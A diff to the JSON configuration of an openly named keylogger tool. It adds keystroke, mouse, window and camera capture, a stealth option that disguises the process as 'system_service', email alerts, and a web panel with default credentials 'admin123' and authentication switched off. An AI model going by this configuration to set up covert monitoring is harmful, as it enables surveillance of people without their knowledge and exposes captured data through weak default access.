--- a/config.json
+++ b/config.json
@@ -1,6 +1,7 @@
 {
   "logging": {
-    "file_path": "logs/keylog.txt",
+    "level": "INFO",
+    "file_path": "keylogger.log",
     "max_size_mb": 100,
     "buffer_size": 100,
     "flush_interval": 5.0,
@@ -17,16 +18,46 @@
     "secure_delete": true
   },
   "features": {
+    "keyboard": true,
+    "mouse": true,
+    "clipboard": false,
+    "window_tracking": true,
+    "screenshots": false,
+    "camera": true,
     "keyboard_logging": true,
     "mouse_logging": true,
     "clipboard_logging": true,
     "screenshot_capture": true,
-    "window_tracking": true,
     "application_monitoring": true,
     "network_monitoring": false,
     "file_monitoring": false
   },
   "privacy": {
+    "sanitize_passwords": true,
+    "hash_sensitive_data": true,
+    "clipboard_max_length": 1000,
+    "max_text_length": 1000,
+    "sanitization_method": "hash",
+    "excluded_applications": [
+      "password_manager.exe",
+      "keepass.exe",
+      "1password.exe",
+      "bitwarden.exe"
+    ],
+    "sensitive_keywords": [
+      "password",
+      "passwd",
+      "pwd",
+      "ssn",
+      "social security",
+      "credit card",
+      "card number",
+      "cvv",
+      "pin",
+      "secret"
+    ],
+    "log_mouse_coordinates": false,
+    "coordinate_precision": 10,
     "filter_passwords": true,
     "filter_credit_cards": true,
     "filter_social_security": true,
@@ -46,26 +77,47 @@
     "email_pattern": "\\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Z|a-z]{2,}\\b"
   },
   "performance": {
+    "screenshot_interval": 15,
+    "window_check_interval": 1.0,
+    "clipboard_check_interval": 1.0,
+    "max_memory_usage_mb": 500,
+    "thread_pool_size": 4,
+    "text_flush_interval": 5.0,
+    "max_key_sequence": 100,
+    "typing_timeout": 2.0,
+    "mouse_move_threshold": 10,
+    "mouse_move_interval": 1.0,
+    "max_click_sequence": 50,
+    "double_click_threshold": 0.5,
+    "mouse_batch_size": 50,
+    "mouse_batch_timeout": 2.0,
     "max_text_length": 1000,
     "flush_interval_seconds": 10,
     "typing_timeout_seconds": 2,
-    "mouse_move_threshold": 10,
-    "mouse_batch_size": 50,
-    "clipboard_check_interval": 1.0,
-    "screenshot_interval": 15,
     "memory_limit_mb": 500,
-    "cpu_limit_percent": 10
+    "cpu_limit_percent": 10,
+    "buffer_size": 1000,
+    "flush_interval": 30
   },
   "remote": {
     "enabled": false,
     "server_url": "",
     "api_key": "",
-    "upload_interval_minutes": 60,
+    "upload_interval": 3600,
     "compress_uploads": true,
+    "upload_interval_minutes": 60,
     "retry_attempts": 3,
     "timeout_seconds": 30
   },
   "alerts": {
+    "email_enabled": false,
+    "email_smtp_server": "smtp.gmail.com",
+    "email_smtp_port": 587,
+    "email_username": "",
+    "email_password": "",
+    "email_to": "",
+    "alert_on_startup": true,
+    "alert_on_errors": true,
     "enabled": false,
     "email_notifications": false,
     "telegram_notifications": false,
@@ -94,6 +146,9 @@
   },
   "stealth": {
     "hide_console": false,
+    "process_name": "system_service",
+    "startup_delay": 30,
+    "auto_start": false,
     "run_as_service": false,
     "process_name_disguise": "",
     "startup_delay_seconds": 0,
@@ -105,13 +160,32 @@
     "host": "127.0.0.1",
     "port": 5000,
     "debug": false,
+    "admin_username": "admin",
+    "admin_password": "admin123",
+    "secret_key": "your-secret-key-here",
     "auth_required": true,
     "username": "admin",
     "password": "admin123",
     "ssl_enabled": false,
     "ssl_cert_path": "",
     "ssl_key_path": "",
-    "session_timeout_minutes": 30
+    "session_timeout_minutes": 30,
+    "auth_enabled": false
+  },
+  "camera": {
+    "enabled": false,
+    "device_index": 0,
+    "segment_seconds": 60,
+    "fps": 15,
+    "width": 640,
+    "height": 480,
+    "resolution": "640x480",
+    "format": "mp4",
+    "codec": "mp4v",
+    "grayscale": false,
+    "blur": 0,
+    "encrypt": false,
+    "storage_path": "data/camera"
   },
   "screenshots": {
     "enabled": true,
